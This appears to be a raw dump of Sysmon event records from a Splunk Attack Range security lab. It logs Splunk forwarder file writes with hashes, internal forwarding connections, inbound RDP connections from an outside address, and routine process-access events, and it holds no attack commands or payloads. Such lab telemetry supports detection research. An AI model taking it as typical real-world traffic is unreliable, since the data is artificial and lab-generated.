11:05:52.458{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E3300153C2C756A2A7A097CA491D562,SHA256=533F32036F205D396CD732CC32103540C09C4105AEF2A21082F85C266C664C4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295261Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:53.903{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBEE3B55170586C14AC2FD90DDDC89E4,SHA256=2501EE4022E01E4025DE37160E497BB5E3B95A173987620A3548759CCFC37524,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219459Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:50.766{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx52537-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219458Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:53.787{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=098AB590F3590EC71713A758424D3190,SHA256=4F64489690E6F782EB3E385BFF248851D2F9E55E4A819952FF7400666A8BDC6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219457Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:53.568{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63022C5C9656EA968DF54BC7F322A7B1,SHA256=5232697D9EC097828879560566574B2602A5EE54707B0974C7B0195AF3380574,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295260Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:50.662{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49219-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295262Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:54.918{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=975EBD45C5678D1A2B59705A032F9612,SHA256=067C1C2CD7032965D502CB303916A810084C8B825A960F72EFBD79F4BD803E50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219460Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:54.599{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E45A287148B6A63BE88EFFE94ABDF8E2,SHA256=0400D6D9132BECD66C751F36B2745C1C57C711A53D9704067AB242BBD4C90134,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219462Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:52.672{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51519-false10.0.1.12-8000- 23542300x8000000000000000219461Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:55.755{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DC57DB881796BCA630205AAFCD116AD,SHA256=B172F2E4B953151485DD2AD9EB6B67F17D6CB5B8CDCCE6E92F56EE79A25F6AA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295263Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:55.919{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23005774ECE794CEBA6B189A5041721B,SHA256=1CEBC82237B9DA68A431E0B6D4208C336768ED76FEEEEAF63B62D630BD6F1601,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295264Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:56.938{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A0EB33182F49CC347E6488DC26840BD,SHA256=756AD20BC1233E13C7E2394DF3C479BDC8BF3EA596E55F6FCB82AEA467AADBB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219463Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:56.989{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A5E439A6BAB1960D1D3AEE953D47235,SHA256=E6F02AC04C37AB296A5AF03D5308A899483FCE02A7E7F6E52C92149B90F6F737,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295265Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:57.954{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAFCB1A8965189C14F605B2781A65524,SHA256=8ACDF0AFA90FD8ED74EB68BD4A9E8ABD83D45A4FB4FB757C9DAFA4642746AC57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219465Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:57.958{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE4D2B18A67C420282D749166E245FDB,SHA256=74F699DA8191C81731DCB9F0D02C48043D32CAFBA898B0D13AAC64190B3673E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219464Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:54.194{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx52322-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000295267Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:58.985{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=549EEB6372AFCD5E1C515E32C5D009EE,SHA256=08B08C58760A334B7962882912C803B94F28930EBC6D4650A7F20B889BBBD1D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295266Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:05:55.706{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49220-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000219466Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:58.099{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82EF911953BC103F5B8D93CC687EB37A,SHA256=2CB33DB7B749D2F44C4E2ED5C8F291AED8945AAE9965336369E6F220B96A96D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219467Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:59.114{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65BA5F37DD0D850B2190E6261039E8A0,SHA256=6AA9632D79A6E53BC4C9F6E173B1F046F2079A3CF492F86966679D137DB9EBB6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219470Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:58.454{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51520-false10.0.1.12-8000- 354300x8000000000000000219469Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:05:57.885{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx53410-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219468Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:00.349{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2CFA1635905A1B106132C7DFFFEFDBB,SHA256=1068885C7E7C20AC685626D77E29440EC0940E8DA8B98A251267C8AD825C588B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295268Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:00.000{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36A948E78493500C8B3B2AC2C6449A70,SHA256=7B49C74FDB041BC15EFBFC663778F16A8BF14F7078141246AAF33349318D5C6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219472Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:01.364{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77F8394D90B41BA34D6166550BEB0FD3,SHA256=59A872A609B4F5A38C660FE12A35CF8835E471A011F6BCC63E5D8A4AFD2F350F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:01.536{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1519-6216-BA06-000000003802}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:01.515{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:01.515{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:01.515{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:01.515{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:01.515{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1519-6216-BA06-000000003802}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295271Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:01.515{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1519-6216-BA06-000000003802}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295270Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:01.517{C8EA50B7-1519-6216-BA06-000000003802}900C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295269Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:01.016{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1D68C0FFC545D85A6D5E2061E8E6F26,SHA256=2F66E1DBD278776D907C298C0308E731A3AFF0378643F4A85E54DD23AF7CB814,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219471Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:01.224{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86772148A8609785BDEC0A2097035B15,SHA256=147DC5B7B376092926EBC929839FEB434E52E910A5D53D772325DDF4AB996435,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219473Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:02.380{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E2FCC7EFD194B74EB4473A8529B6ED8,SHA256=A1E93215E7EAB5E6D48307EDA68FC16C296508C7747B9F38419DA1ED3CE62144,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:02.629{C8EA50B7-151A-6216-BB06-000000003802}52887112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:02.224{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-151A-6216-BB06-000000003802}5288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:02.171{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:02.171{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:02.170{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 